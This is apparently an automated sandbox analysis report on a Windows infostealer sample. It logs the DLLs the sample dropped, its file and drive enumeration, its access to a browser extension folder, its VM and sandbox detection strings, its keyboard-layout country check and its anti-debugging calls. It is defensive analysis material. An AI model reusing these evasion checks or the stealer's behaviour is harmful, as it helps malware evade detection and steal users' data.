Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: file.exe

Static file information: File size 1129584 > 1048576

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: mozglue.pdbP source: mozglue.dll.1.dr, mozglue[1].dll.1.dr
Source:	Binary string: freebl3.pdb source: freebl3.dll.1.dr, freebl3[1].dll.1.dr
Source:	Binary string: freebl3.pdbp source: freebl3.dll.1.dr, freebl3[1].dll.1.dr
Source:	Binary string: nss3.pdb@ source: nss3.dll.1.dr, nss3[1].dll.1.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.1.dr, softokn3.dll.1.dr
Source:	Binary string: C:\w7u2b6tslydotp\Body.pdb source: file.exe
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140[1].dll.1.dr, vcruntime140.dll.1.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.1.dr, msvcp140[1].dll.1.dr
Source:	Binary string: nss3.pdb source: nss3.dll.1.dr, nss3[1].dll.1.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2796179950.00000000164F6000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.1.dr
Source:	Binary string: mozglue.pdb source: mozglue.dll.1.dr, mozglue[1].dll.1.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.1.dr, softokn3.dll.1.dr

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 1_2_00418970 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_00418970

Source: file.exe	Static PE information: section name: .00cfg
Source: freebl3[1].dll.1.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.1.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.1.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.1.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.1.dr	Static PE information: section name: .didat
Source: nss3.dll.1.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.1.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.1.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.1.dr	Static PE information: section name: .00cfg
Source: sqln[1].dll.1.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.1.dr	Static PE information: section name: .00cfg

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00232207 push ecx; ret	0_2_00274113
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00314CCD push ecx; ret	0_2_00314CE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_0041A8B5 push ecx; ret	1_2_0041A8C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C251BF9 push ecx; ret	1_2_1C3F4C03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C2510C8 push ecx; ret	1_2_1C453552

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\KFBFCAFCBKFI\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\KFBFCAFCBKFI\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\KFBFCAFCBKFI\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\KFBFCAFCBKFI\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\KFBFCAFCBKFI\softokn3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\KFBFCAFCBKFI\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqln[1].dll	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\KFBFCAFCBKFI\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\KFBFCAFCBKFI\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\KFBFCAFCBKFI\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\KFBFCAFCBKFI\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\KFBFCAFCBKFI\softokn3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\KFBFCAFCBKFI\nss3.dll	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

1_2_00418970

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: RegAsm.exe PID: 4904, type: MEMORYSTR

Country aware sample found (crashes after keyboard check)

Source: c:\users\user\desktop\file.exe

Event Logs and Signature results: Application crash and keyboard check

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: file.exe, RegAsm.exe	Binary or memory string: DIR_WATCH.DLL
Source: file.exe, RegAsm.exe	Binary or memory string: SBIEDLL.DLL
Source: file.exe, RegAsm.exe	Binary or memory string: API_LOG.DLL
Source: RegAsm.exe, 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: AAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\KFBFCAFCBKFI\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\KFBFCAFCBKFI\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\KFBFCAFCBKFI\softokn3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqln[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\KFBFCAFCBKFI\nss3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe

API coverage: 0.7 %

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 1_2_004103D0 GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00410502h

1_2_004103D0

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_002C97DC FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_002C97DC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_002C9B02 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_002C9B02
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_0040B1B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	1_2_0040B1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_00401200 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,	1_2_00401200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_0040D4F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_0040D4F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_00416740 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,strtok_s,memset,lstrcat,strtok_s,PathMatchSpecA,wsprintfA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,	1_2_00416740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_00417800 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	1_2_00417800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_00416F50 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	1_2_00416F50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_004173C0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	1_2_004173C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_0040A660 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	1_2_0040A660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_0040AAE0 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	1_2_0040AAE0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 1_2_00416BB0 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlen,

1_2_00416BB0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 1_2_004105A0 GetSystemInfo,wsprintfA,

1_2_004105A0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: Amcache.hve.4.dr	Binary or memory string: VMware
Source: Amcache.hve.4.dr	Binary or memory string: VMware Virtual USB Mouse
Source: RegAsm.exe, 00000001.00000002.2794775836.000000000175C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.4.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.4.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.4.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.4.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.4.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.4.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: RegAsm.exe, 00000001.00000002.2794775836.0000000001674000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: Amcache.hve.4.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW+
Source: Amcache.hve.4.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.4.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.4.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.4.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.4.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.4.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.4.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.4.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.4.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.4.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.4.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.4.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: RegAsm.exe, 00000001.00000002.2794775836.000000000155A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: Amcache.hve.4.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.4.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: RegAsm.exe, 00000001.00000002.2794775836.000000000155A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWXp\
Source: RegAsm.exe, 00000001.00000002.2794775836.0000000001627000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: Amcache.hve.4.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.4.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.4.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.4.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.4.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.4.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node			graph_1-81232
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node			graph_1-82335

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_002C8EA7 IsDebuggerPresent,

0_2_002C8EA7

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

1_2_00418970

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_002CC0BA mov eax, dword ptr fs:[00000030h]	0_2_002CC0BA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_002CC10D mov eax, dword ptr fs:[00000030h]	0_2_002CC10D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_002CC160 mov eax, dword ptr fs:[00000030h]	0_2_002CC160
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_002CC1D1 mov eax, dword ptr fs:[00000030h]	0_2_002CC1D1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_002CC2C4 mov eax, dword ptr fs:[00000030h]	0_2_002CC2C4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_002CC319 mov eax, dword ptr fs:[00000030h]	0_2_002CC319
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_002CC36E mov eax, dword ptr fs:[00000030h]	0_2_002CC36E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_002CC3AB mov eax, dword ptr fs:[00000030h]	0_2_002CC3AB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_002B9C27 mov ecx, dword ptr fs:[00000030h]	0_2_002B9C27

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 1_2_0040D090 CopyFileA,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,memset,DeleteFileA,

1_2_0040D090

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00274166 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00274166
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00284F55 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00284F55
